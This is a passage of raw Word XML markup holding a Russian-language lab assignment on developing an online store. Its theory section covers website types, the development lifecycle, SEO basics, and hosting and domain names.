          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Студент разрабатывает алгоритм создания интернет магазина, пример алгоритма содержится в теоретической части.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержится алгоритм разработки интернет-магазина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00E02314" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание web сайта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свой личный сайт в Интернете – это хорошее подспорье, которое позволяет приоткрыть разнообразные границы. Современное общество невозможно представить без Интернета, поэтому создание web сайтов позволяет очень быстро передавать различного рода информацию удаленным пользователям. Собственные интернет проекты – это отличная возможность взаимодействия, а также сотрудничества между партнерами и заказчиками. Помимо этого, процедура создание web сайтов может быть прекрасной возможностью, для того, чтобы повысить популярность, как вашей компании, так и продукции. Следовательно, такой процесс, как создание web сайтов является замечательной возможностью, которая позволяет успешно функционировать и развиваться любого рода бизнесу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как любому успешному человеку, вам известно, что в первую очередь, необходимо задаться целью, чего именно вы хотите, т.е. какого рода интернет ресурс для вас будет наиболее приемлемый. В связи с этим, выделяют следующие варианты, которые могут быть созданы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сайта-визитка;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Корпоративный портал;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Промо-сайт;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Интернет-магазина;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Информационный портал.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для того чтобы заказать создание web проекта для своих целей, необходимо применение только самой современной технологии, которая обладает отличными возможностями, известными только настоящими специалистами. При этом, разрабатывая определенный проект для организаций или частного лица, необходимо придерживаться определенных этапов. Создание какого-либо проекта в сети интернет имеет определенный цикл и разбивается на мелкие подэтапы, имеющие жесткие сроки выполнения. Данная процедура позволяет заказчикам отслеживать ход выполнения создание web сайтов и, если понадобится, смогут внести определенные коррективы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Жизненный цикл проекта, позволяющий создать сайт, состоит из следующих этапов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Составление технического задания;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Разработка соответствующего дизайна;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Верстка страниц;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Компьютерными инженерами осуществляется программирование;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Тестирование проекта;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Завершающим этапом является переход на хостинг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Корпоративный портал организации является доступным и оперативным источником информации, позволяющий представлять организацию и выполняет функцию информированности, кроме того, это реклама для компании, т.е. он является отличным рекламным инструментом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сегодня создание корпоративного сайта для предприятия </w:t>
      </w:r>
      <w:r w:rsidR="00BD609E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> это возможность рекламировать свои услуги в сети интернет, корпоративный портал своего рода является визитной карточкой фирмы, который должен полностью отражать специфику деятельности компании, ее основные приоритеты и стиль.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Индивидуальный подход – это именно то, что несет под собой создание корпоративного сайта организации. Даже в самом начале разработки данного проекта, необходимо расставить все точки над </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, расставив при этом всевозможные приоритеты и оговорить все существующие тонкости и моменты, по разработке дизайна для будущего проекта, а также дальнейшего его продвижения. Процесс, который подразумевает создание корпоративного сайта фирмы, зависит от множества факторов, а именно: особенности компании и отрасли, в которой она функционирует;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Потенциальная аудитория, на которую направлено создание корпоративного сайта компании;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Специфические моменты деятельности предприятия, выражающиеся в своих предложениях своим потенциальным клиентам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не стоит забывать, что создание корпоративного сайта для организации – это в первую очередь рекламный ход, который требует особенного продвижения проекта. Существует несколько способов продвижения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продвижение в поисковых системах Интернета;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Применение такого вида рекламы, как контекстная;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продвижение при помощи баннерной рекламы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Однако самым оптимальным вариантом, для того, чтобы корпоративный портал получил определенную отдачу и соответствующий эффект является применение всех вышеперечисленных способов продвижения в совокупности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если у вас есть свой собственный сайт, то вам просто необходимо знать о SEO. Хотите привлечь на сайт больше посетителей, чтобы иметь возможность продемонстрировать им свои товары и услуги или же просто заработать в интернете? Это желание осуществимо! Единственное, что для этого нужно – продвинуть сайт в ТОП-10 выдачи поисковых систем. А чтобы сайт был в заветном ТОПе, нужно знать основы оптимизации и продвижения сайта в поисковых системах и уметь ими пользоваться.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Начнем со знакомства с понятием СЕО. SEO расшифровывается как Search Engine Optimization, что в переводе означает поисковая оптимизация или же оптимизация под поисковые машины.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Смысл этих трех слов – это оптимизация сайта для дальнейшего продвижения сайта в рейтинге поисковых систем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чем выше позиция вашего сайта в выдаче поисковика, тем больше вероятность, что посетитель зайдет на сайт, так как примерно 100% заходит по первым трем ссылкам поисковой выдачи, далее тенденция к уменьшению – до десятой ссылки первой страницы выдачи добираются 20-50% пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вторую страницу выдачи поиковика заходят 10-20%. Следовательно, для всякого ресурса наиболее желанно место именно в первой десятке поисковой выдачи. Но, к сожалению, сайтов-конкурентов слишком много, а десятка всего одна. Появляется резонный вопрос: как же покорить это вершину и выбиться в лидеры? И тут SEO-оптимизация сайта приходит на помощь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Поисковую SEO-оптимизацию условно можно разделить на три части:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Первая часть заключается в работе внутри сайта. В нее входят исправление возможных ошибок, добавление и изменение контента, HTML-кода страниц сайта, перелинковка и так далее. Так называемая внутренняя оптимизация. Насколько действенным будет первый шаг, зависит только от Ваших усилий и знаний в этой области. Нужно так же учесть, что алгоритмы поисковиков немного различаются и поэтому оптимизация под Google должна чуть-чуть отличаться от оптимизации под Яндекс.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вторая часть SEO-оптимизации – это раскрутка сайта самостоятельно. На этом шаге необходимо вывести ресурс на первые позиции с помощью групп мероприятий, выполняющихся вне сайта (на других сайтах, в каталогах статей, форумах, закладках и прочих площадках), задача которых нарастить необходимую ссылочную массу и продвинуть сайт по целевым запросам, а так же увеличить его авторитетность. Это называется продвижением сайта или внешней оптимизацией.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Третья часть заключается в поддержании достигнутых позиций и улучшении полученных результатов. Наблюдение за своими результатами и показателями конкурентов, изменение ключевых слов, текстов для ссылок, содержания сайта, корректировка площадок – все это обязательно нужно иметь в виду, чтобы сохранить занятые позиции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Хостинг и домен – это понятия, которые определяют место жительства сайта в Интернете. Хостинг обеспечивает необходимое пространство для хранения вашего сайта в интернете, а домен отвечает за его онлайн адрес. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>! хостинг и домен - это понятия арендуемые, то есть, нельзя приобрести их навсегда, вы должны периодически выплачивать за них определенную сумму. К примеру, минимальный срок заказа домена составляет один год, а хостинга – один месяц. Но давайте углубимся в рассмотрение этих значений, дабы вам все стало ясно. Хостинг – это как бы квартира для сайта. То есть, вы обращаетесь к какому-то хостинг провайдеру (онлайн-землевладельцу), он предлагает вам определенные условия (виртуальный или выделенный сервер, поддержка скриптов и программных языков, необходимое пространство), а вы решаете, подходят ли они вам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После согласия вам выдается заказанное место на жестком диске, это и есть ваша уютная квартирка. Сам жесткий диск – это часть сервера провайдера, все сервера хранятся в специально организованных зданиях, которые именуются дата-центрами. Здесь все обусловлено для того, чтобы все оборудование находилось в непрерывной связи с Интернетом. Соответственно, ваш сайт, хранимый на харде одного из серверов, также расположен в Виртуальной Паутине.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Но на этом процесс не закончен. Ведь хостинг, то есть, квартира у вашего веб-продукта имеется, а вот прописки нету. И никто не знает, по какому адресу ваш ресурс расположен. А потому нужно подобрать ему соответствующее название. Как правило, домен состоит из двух частей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Первая часть, то есть, первый уровень домена, сообщает о том, в какой стране </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>прописан</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> сайт или к какой деятельности он относится. То есть, это может быть зона .ru или .рф, свидетельствующая о </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>российском</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> гражданстве проекта, зона .com, говорящая о коммерческой принадлежности сайта и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>А вторая часть является основной, то есть, главным именем домена. Она несет в себе то, как вы хотите выразить свой проект. К примеру, посмотрите домен этого сайта: service-joomla. А в полном виде домен выглядит так: service-joomla.ru (.ru - это доменная зона).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Также имеют право на существование домены третьего уровня и выше, но обычно они не котируются в качестве основных адресов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ну вот, теперь вам вполне хватит знаний о хостинге и домене!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Правильный выбор хостинга для сайта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Реклама услуг хостинга встречается все чаще. Неопытный пользователь может легко заблудится в этих недрах рекламных предложений. Поэтому, подходить к этому вопросу нужно скрупул</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
